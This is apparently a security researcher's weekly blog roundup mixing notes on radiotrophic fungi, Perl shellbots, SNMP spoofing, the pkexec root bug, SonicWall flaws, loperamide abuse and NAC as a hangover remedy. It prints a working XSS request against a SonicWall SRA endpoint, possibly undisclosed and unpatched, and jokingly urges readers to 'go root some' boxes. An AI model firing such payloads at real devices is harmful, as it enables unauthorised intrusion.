The allegedly weekly roundup of notes – Jan 28th, 2022

Alright, we are back for a third week of this. Somehow. If I remember to post this. Shorter this week as I had a lot of work on, unfortunately. There are dozens of open tabs that I might even read next week and summarise here. Maybe.

I realised while posting last weeks one that this is also a great way for me to finally close some tabs! Only 42069 browser tabs to go, on this laptop at least.

There should be some more regular pieces in the coming weeks – an amusing backdoor I developed that deserves a writeup, some exploit development stuff, etc.

Anyway, here is this weeks roundup.

Using radiotrophic fungi as a “shield” from radiation in space?
So firstly, you have to come to terms with the fact that radiotrophic fungi are a thing that actually exist. That being, fungi that derive energy from ionising radiation. Kind of like the protomolecule in the expanse, these little fuckers eat radiation to grow.

While most sensible scientists would just leave such cursed abominations the fuck alone, the mad bastards who wrote this paper figured we could make the little critters useful, by using them as a self replicating “shield” or “barrier” against radiation.

In space.

So they shipped off some of this stuff to the ISS and examined it over a period of time, finding out that yes, these little fungi will more than happily act as a shield against background radiation in space, and grow rather nicely.

The plan seems to be to use these fungi as self-growing shields of sorts if we ever make it to Mars, so our first colonists don’t just get wrecked by background radiation. Beats lugging giant lead shielding around, anyway.

Perl “shellbots” will never die.
So I came across this blog post, about a malware campaign targeting Gitlab CE instances that drops a Perl “shellbot”.

The bit in the blog post suggesting the authors of the malware are Portugese, and that it has been around since at least 2015 gave me pause.

Perl “shellbots” of the my $pacotes = 1; strain (a common string to them all) have been around since at least 2008 or so, and originate from Brazil. However, in the past years everyone has just… Ignored them, mostly. So they are forgotten.

Now, I’m not bashing the author here. I’m pointing out that old, tired malware is still relevant even in modern times, over a decade later, and that we shouldn’t forget the old shit or think its irrelevant.

After all, even Conficker is still around 🙂

Sorry, SonicWall. (just an XSS this time).
Look, I have a theme going here, alright? I’ll probably not mention this vendor at all for the next month.
Anyways, while looking through some notes from investigating a SonicWall SRA SQL injection bug, I found this XSS that I found while investigating. Unsure if I disclosed it, so here you go. Have fun popping alert boxes.

GET /cgi-bin/supportInstaller?setiemode=true&URL=</a><script>alert(0)</script>

That is it, that is the bug. I can’t recall which exact versions are impacted, or if any feature needs enabling. Or if its patched.

Have fun.

Hacking Cisco networks using spoofed SNMP packets.
So you got the community RW string for a bunch of Cisco devices, but the cheeky bastards have set it up so only a trusted host will be allowed to do SNMP requests.

Lucky you, UDP spoofing is fast and easy! I’d been trying to dig up this blogpost for ages, and after spelunking through archives, found it. Give that a read first.

NCC Group also have released a tool for this, which you can find here.

Loperamide overdose is a thing, apparently, as a bootleg methadone replacement.
Sometimes you click on content that you suspect is going to be clickbait as fuck, but turns out to not only be decent, but also contains a bunch of references. This video by “chubbyemu” is exactly that.

With references and a surprisingly informative (albeit simplified for a general audience) breakdown of the pharmacology/medical stuff, this video taught me something new: that people sometimes abuse massive doses of loperamide, an over the counter anti-diarrhea medication, as kind of a bootleg methadone to deal with the symptoms of opiate withdrawal. Sometimes with fatal outcomes.

More casualties in the pointless war on drugs.

More pharmacology: NAC as a hangover cure?
In a past life as a complete pisshead, I spent a great deal of time and effort trying to find the perfect hangover cure.

Turns out, some scientists and grant writers are also heavy drinkers, and some research was done into the use of NAC (n-acetylcystiene) as a hangover cure. You can find the paper here.

They note that the method they used to get the subjects pissed wasn’t great, and that no real difference in how miserable the participants felt the next day was found between placebo and test groups. However, they did find that women responded more than men to NAC in terms of “feeling less miserable”. Further testing required.

Another study on NAC found that it helped prevent adverse impacts on zebrafish livers when exposed to ketamine. Given ketamine is often consumed alongside alcohol at festivals, there could be something useful there in terms of harm reduction or harm mitigation.

A number of ethanol enthusiasts on /r/drugnerds also reckon NAC helps prevent their hangovers, when taken as a prophylactic. It is noted though that it has to be taken before drinking, and taking it after one starts drinking can result in worse hangovers. Interesting.

Personally, I can advise the only way to 100% avoid a hangover is to lay off the sauce a bit, and drink more water.

I’ll probably do more reading on NAC in future, as while its currently the supplement of choice for antivaxers resulting in the FDA stepping in, I did come across a few abstracts mentioning it being useful for asthmatics or COPD sufferers, along with potential use cases in addiction treatment for nicotine or cocaine due to impacts on dopamine. It also appears to have some use in cases of schizophrenia or bipolar.

It is also interesting that it is used in clinical settings (in huge quantities) as a treatment for paracetamol (tylenol for the yanks) overdose.

PolicyKit’s pkexec grants root shells trivially.
I love a good userland local privesc on Linux. Qualys reported on a trivially exploitable local root exploit in pkexec, which effectively grants you instant root on most major Linux distributions. Turns out, the bug has been known about since 2013, but wasn’t exploited or fixed back then!

A whole bunch of exploits are in the wild now. The first was from bl4sty, to which I proposed a small modification, then an updated version from bl4sty, and now a whole bunch more variants are out there.

The tweak I proposed isn’t much of anything special, it simply makes the exploit more self contained by using a pretty cursed little trick to give you an executable that is also a shared object. I’ve used this in other exploits, which I should get around to publishing at some point. One or two of the variants since have added this trickery.

Anyway, update your boxes. Or go root some 🙂

SonicWall remote SQL injection, again.
VX Underground announced that exploit code for CVE-2021-20028 has appeared online. Daniel Card has a rather useful thread ongoing about it.

I won’t say too much at this time as I don’t actually know how embargoed details are, but it is extremely similar to CVE-2019-7481 – in fact, the exploit implements the older CVE as well as the new one.

It also implements a path traversal (post authentication) to leak config data from the device, and possibly another bug to do with config leaking involving an email, but I haven’t looked at that part yet.

Anyway, the exploit gives an attacker remote access via the VPN, and also (in many cases) active directory credentials to the network. Often for a privileged account. So its an incredibly short path from “remote, no auth” to “complete domain compromise”. No wonder ransomware groups are all over it.

I’ll publish a longer piece on the exploit code that was released once I feel it won’t be stepping on any toes. Patch your SonicWall devices, or just throw them out the window.

Book bans are back!
Across the US, for some absurd reason, books are being banned in schools. Here (warning, PDF) is a list of books that are being supposedly prohibited in schools in Texas.

It is not 100% clear to me if they are being immediately pulled from shelves, or what exactly is going on – if future acquisition is prohibited, if access to them will be monitored and controlled, or what.

Either way, banning books is fucking stupid. That is all.

IBM Mainframe Classes (online) and Learning Licences.
Came across this on the orange website. TL;DR: IBM has some free classes on mainframe programming and stuff that you can take. If you earn some silly badges for taking these classes, you qualify for a relatively inexpensive (in IBM terms, anyway) learners licence for IBM’s z/OS development and test environment which runs on your PC.

I’d strongly suggest anyone with even the vaguest interest in hacking Big Iron go and avail of this. It is important to actually understand how to use a mainframe before you go hacking on one.

An interesting piece on gold mining from the Atavist.
Eventually, I’ll probably have read the entire back catalogue of the Atavist and recommended their stuff here. This piece, on some incredibly sketchy dealings around gold mining in Peru, how gold gets into the financial system, how its extracted, etc, is well worth the time to read.

As always with articles like this, I will say no more, as that would spoil the fun.

Finally, a photo of my cat.
I take so many photos of my cat that it seems a little daft to not include the best/most amusing one each week.

%d bloggers like this: